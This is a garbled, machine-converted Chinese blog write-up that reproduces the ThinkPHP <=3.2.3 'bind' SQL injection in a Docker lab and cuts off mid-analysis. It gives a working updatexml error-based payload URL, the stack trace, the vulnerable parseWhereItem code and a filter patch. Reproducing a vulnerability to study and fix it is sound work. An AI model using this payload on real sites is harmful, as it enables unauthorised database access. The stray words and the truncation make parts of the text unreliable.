ref:ThinkPHP Builder.php SQL注入漏洞(<= 3.2.3)

時間 2019-11-11

標籤 ref thinkphp builder.php builder php sql 注入漏洞 3.2.3 欄目 PHP 简体版

原文原文鏈接

ThinkPHP Builder.php SQL注入漏洞(<= 3.2.3)

ref:https://www.jianshu.com/p/18d06277161ephp

TimeSHU 2018.04.21 02:03* 字數 761 閱讀 23評論 2喜歡 0

ThinkPHP Builder.php SQL注入漏洞(<= 3.2.3)的一次漏洞復現做業html

-------------------------------------------------------------sql

1.進入docker內部環境說明

service docker start;

docker ps;列出當前容器

docker exec -it 9b96ee2b /bin/bash;//9b96ee2b爲container_id

2.實際調試堆棧以及參數傳遞狀況：

/var/www/html# more index.php

// 開啓調試模式建議開發階段開啓部署階段註釋或者設爲false；方便打印日誌。

define('APP_DEBUG',True);

下面是根據TimeSHU提供的docker環境調試update注入狀況分析。

這是poc:http://192.168.3.6/Home/Index/readcategorymsg?category[0]=bind&category[1]=0%20and(updatexml(1,concat(0x7e,(user())),0))docker

category是數組：
0:"bind"
1:"0 and(updatexml(1,concat(0x7e,(user())),0))" thinkphp

出錯堆棧信息：
#0 /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(350): E('1105:XPATH synt...')。
#1 /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(237): Think\Db\Driver->error()
#2 /var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(906): Think\Db\Driver->execute('UPDATE `vulapps...', false)
UPDATE `vulapps_message` SET `is_read`='1' WHERE `category` = '1' and(updatexml(1,concat(0x7e,(user())),0))//儘管前面爲false，可是後面任然要執行。這次報錯：XPATH syntax error: '~root@localhost'。數據庫

/var/www/html/ThinkPHP/Library/Think/Db/Driver.class.php(906): public function update($data,$options)
sql語句:return $this->execute($sql,!empty($options['fetch_sql']) ? true : false);ubuntu

UPDATE `vulapps_message` SET `is_read`=:0 WHERE `category` = :0 and(updatexml(1,concat(0x7e,(user())),0))數組

漏洞代碼：bash

protected function parseWhereItem($key,$val)//category,array(2) { [0]=...
if(is_array($val)) {
if(is_string($val[0])) {
$exp = strtolower($val[0]);//array(2) { [0]=> string(4) "bind" [1]=> string(43) "0 and(updatexml(1,concat(0x7e,(user())),0))" } ,則exp=bind
}elseif('bind' == $exp ){ //
$whereStr .= $key.' = :'.$val[1];//$whereStr.=category=:0 and (updatexml...)此處將:0拼接進去，爲後面pdo參數替換製造了機會。
這裏能夠看出來若是where是一個數組的話，而且第一個元素爲bind，那麼直接就進行了拼接操做，分析到這裏咱們看看I函數的過濾限制並無將bind排除。app

#3 /var/www/html/ThinkPHP/Library/Think/Model.class.php(451): Think\Db\Driver->update(Array, Array)
$result = $this->db->update($data,$options);
echo var_dump($data):
array(1) { ["is_read"]=> int(1) } array(3) { ["where"]=> array(1) { ["category"]=> array(2) { [0]=> string(4) "bind" [1]=> string(43) "0 and(updatexml(1,concat(0x7e,(user())),0))" } } ["table"]=> string(15) "vulapps_message" ["model"]=> string(7) "message" }

#4 /var/www/html/Application/Home/Controller/IndexController.class.php(18): Think\Model->save(Array)
public function readcategorymsg(){
$condition['category'] = I("category");
$data['is_read'] = 1;
$res = M("message")->where($condition)->save($data);
echo var_dump($condition['category'])."<br>";
array(2) { [0]=> string(4) "bind" [1]=> string(43) "0 and(updatexml(1,concat(0x7e,(user())),0))" }

#5 [internal function]: Home\Controller\IndexController->readcategorymsg()
#6 /var/www/html/ThinkPHP/Library/Think/App.class.php(173):

補丁方法：在I函數增長bind過濾。

function think_filter(&$value){ if(preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN|BIND)$/i',$value)){$value.=' ';}

-------------------------------------------------------------

漏洞環境:docker

漏洞分析

首先，咱們知道insert 方法存在漏洞，那就查看 insert 方法的具體實現。

該方法位於thinkphp\library\think\db\Builder.php 文件中，咱們能夠看到在函數開頭調用了 parseData 方法，並將 $data 做爲參數傳入， $data 的值是咱們經過 get方式傳入的一個數組類型的數據，以下圖：